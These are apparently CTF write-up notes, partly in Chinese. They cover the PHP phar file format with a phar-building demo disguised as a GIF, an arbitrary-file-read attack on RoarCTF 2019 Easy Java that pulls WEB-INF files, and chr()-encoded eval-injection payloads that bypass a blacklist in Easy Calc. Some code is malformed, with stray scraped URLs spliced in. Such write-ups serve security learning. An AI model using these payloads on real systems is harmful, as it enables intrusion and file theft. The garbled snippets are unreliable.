It can be interpreted as a flag and the format is xxx<?php xxx; __HALT_COMPILER();?>.The front content is not limited, but it must end with __HALT_COMPILER();?>, otherwise the phar extension will not recognize this file as a phar file.
0x01 A Manitest Describing the ContentsA phar file is essentially a compressed file, in which the permissions, attributes and other information of each compressed file are included. This section also stores user-defined meta-data in serialized form, which is the core of the above attacks.
0x02 The File ContentsIt is the contents of compressed file.
0x03 A signature for verifying Phar integrityphar file format only
DemoConstruct a phar file according to the file structure, and PHP has a built-in class to handle related operations
Set the phar.readonly option in php.ini to Off, otherwise the phar file cannot be generated.
class Demo { @unlink("phar.phar"); $phar = new Phar("phar.phar"); // suffix must be phar $phar->startBuffering(); $phar->setStub("GIF89a<?php __HALT_COMPILER(); ?>"); // set stub and disguise as gif $o = new file(); $o->output = "phpinfo();"; $phar->setMetadata($o); // store custom meta-data in manifest $phar->addFromString("test.txt", "test"); // compressed file $phar->stopBuffering(); // automatic computation of signature };未完成
[RoarCTF 2019]Easy Java点击 help,跳转到/Download?filename=help.docx,存在任意文件读取漏洞
java.io.FileNotFoundException:{help.docx} // 界面回显此时读取文件失败,修改请求方法为 post
filename=http://www.likecs.com/WEB-INF/web.xml
... // 敏感信息 <servlet> <servlet-name>FlagController</servlet-name> <servlet-class>com.wm.ctf.FlagController</servlet-class> </servlet> <servlet-mapping> <servlet-name>FlagController</servlet-name> <url-pattern>/Flag</url-pattern> </servlet-mapping> ... 简述 servlet 的 url-pattern 匹配上述信息中<servlet>首先配置声明一个 servlet,其中包括 servlet 名字以及其对应类名
<servlet-mapping>声明与该 servlet 相应的匹配规则,每个<url-pattern> 代表一个匹配规则
当浏览器发起一个url请求后,该请求发送到servlet容器的时候,容器先会将请求的url减去当前应用上下文的路径作为 servlet 的映射 url,剩下的部分拿来做servlet的映射匹配
filename=http://www.likecs.com/WEB-INF/classes/com/wm/ctf/FlagController.class
下载文件进行反汇编
import java.io.IOException; import java.io.PrintWriter; import javax.servlet.ServletException; import javax.servlet.annotation.WebServlet; import javax.servlet.http.HttpServlet; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; @WebServlet(name = "FlagController") public class FlagController extends HttpServlet { String flag = "ZmxhZ3s1ZTNhNzBjMS0xNzk2LTRmNmQtODUyOC05ZmE1MzYzOGNhZTV9Cg=="; protected void doGet(HttpServletRequest paramHttpServletRequest, HttpServletResponse paramHttpServletResponse) throws ServletException, IOException { PrintWriter printWriter = paramHttpServletResponse.getWriter(); printWriter.print("<h1>Flag is nearby ~ Come on! ! !</h1>"); } } 什么是WEB-INF & WEB-INF重要目录和文件WEB-INF 是 JavaWeb 的安全目录,所谓安全就是客户端无法访问,只有服务端可以访问的目录
/WEB-INF/web.xml
Web应用程序配置文件,描述了 servlet 和其他的应用组件配置及命名规则
/WEB-INF/classes/
包含站点所有用的 class 文件,包括 servlet class 和非servlet class,他们不能包含在 .jar文件中
/WEB-INF/lib/
存放 web 应用需要的各种 JAR 文件
/WEB-INF/src/
源码目录,按照包名结构放置各个java文件
/WEB-INF/database.properties
数据库配置文件
[RoarCTF 2019]Easy Calc(未完成) $('#calc').submit(function(){ $.ajax({ url:"calc.php?num="+encodeURIComponent($("#content").val()), type:'GET', success:function(data){ $("#result").html(`<div> <strong>答案:</strong>${data} </div>`); }, error:function(){ alert("这啥?算不来!"); } }) return false; })访问calc.php得到后台源码
<?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' ', '\t', '\r', '\n','http://www.likecs.com/\'', '"', '`', '\[', '\]','\$','\\','\^']; foreach ($blacklist as $blackitem) { if (preg_match('http://www.likecs.com/' . $blackitem . '/m', $str)) { die("what are you want to do?"); } } eval('echo '.$str.';'); } ?>过滤的常用字符
`$^[]'"%20过滤了单引号,在构造payload时用chr()代替
/calc.php? num=1;var_dump(scandir(chr(47))); // /f1agg /calc.php? num=1;readfile(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)); $payload = "/f1agg"; $arr = str_split($payload); foreach ($arr as $a) echo "chr(".ord($a).")."; //chr(47).chr(102).chr(49).chr(97).chr(103).chr(103).